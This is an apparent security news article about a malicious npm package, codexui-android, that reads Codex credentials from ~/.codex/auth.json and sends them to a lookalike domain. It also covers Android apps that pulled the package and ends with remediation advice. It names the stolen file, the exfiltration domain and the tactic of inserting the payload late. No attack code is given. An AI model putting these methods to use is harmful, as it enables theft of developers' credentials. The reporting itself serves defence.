npm Package Steals OpenAI Codex Tokens for a Month
A popular npm package for OpenAI Codex has been stealing developer authentication tokens for the past month. The package, codexui-android, had roughly 29,000 weekly downloads and appeared legitimate—active GitHub repo, steady development history. But since version 0.1.82, every invocation silently reads ~/.codex/auth.json and sends its contents to an attacker-controlled server.
The stolen data includes access tokens, refresh tokens, ID tokens, and account IDs. According to Aikido Security researcher Charlie Eriksen, “The refresh_token doesn’t expire. An attacker holding it can silently impersonate you indefinitely.”
How the Attack Worked
The attack was unusually sophisticated for an npm supply chain compromise. The GitHub repository remained clean; the malicious code existed only in the npm build. The package extracts the contents of Codex’s ~/.codex/auth.json file—a plaintext credential cache created whenever a user logs in via the Codex app, CLI, or IDE extension. It then sends those credentials to sentry.anyclaw[.]store, a server name chosen to mimic Sentry, the legitimate error-tracking platform.
The nefarious functionality was introduced approximately a month after the package was first published—a common tactic for building trust before deploying a payload. WHOIS records show the exfiltration domain was registered on 12 April 2026, just two days after the first package version (0.1.72) was uploaded to npm. The malicious code appeared from version 0.1.82 onward.
The Same Attack from the Play Store
The npm package was not the only delivery vector. An Android app called OpenClaw Codex Claude AI Agent, published by BrutalStrike, ran the same npm package inside a PRoot sandbox on users’ devices. The app had more than 50,000 downloads on Google Play. A second BrutalStrike app, simply called Codex, had over 10,000 downloads and contained the same exfiltration chain. Because neither app pinned a specific npm package version, they automatically pulled the malicious code the moment it went live.
Combined attack surface: ~29,000 weekly npm downloads + over 60,000 mobile installations. This makes it one of the more significant credential-theft campaigns targeting AI developer tooling.
The Author’s Shifting Story
The npm account behind the package belongs to “friuns,” identified by Aikido as Igor Levochkin. When confronted on GitHub, the author initially claimed to have lost access to the npm account, then edited the response to say they were “currently investigating this issue internally.” Levochkin said no credential data was shared with third parties, but did not explain why the exfiltration code was inserted only into the npm build, or why access to users’ Codex tokens was needed. The X profile linked to the account includes the domain anyclaw[.]store—the same domain to which the stolen tokens were sent.
A Growing Pattern
This attack arrives amid escalating threats to AI developer tooling. Last month, a poisoned VS Code extension breached GitHub’s own internal repositories, exfiltrating 3,800 repos after an employee installed the malicious package. That attack harvested credentials from 1Password vaults, Claude Code configurations, and AWS.
As AI coding tools become essential infrastructure, the authentication tokens they generate—often stored in plaintext—are high-value targets. OpenAI’s own documentation warns developers to treat ~/.codex/auth.json like a password. This campaign demonstrates what happens when that advice goes unheeded.
What You Should Do Now
- Check if you have
codexui-androidinstalled. Runnpm ls codexui-androidin your projects. - If found, immediately revoke all your OpenAI Codex tokens. Go to your OpenAI account settings and rotate API keys.
- Delete
~/.codex/auth.jsonand re-authenticate. - Monitor for any unauthorized usage of your Codex account.
- Pin your npm package versions to avoid automatic updates pulling malicious code.
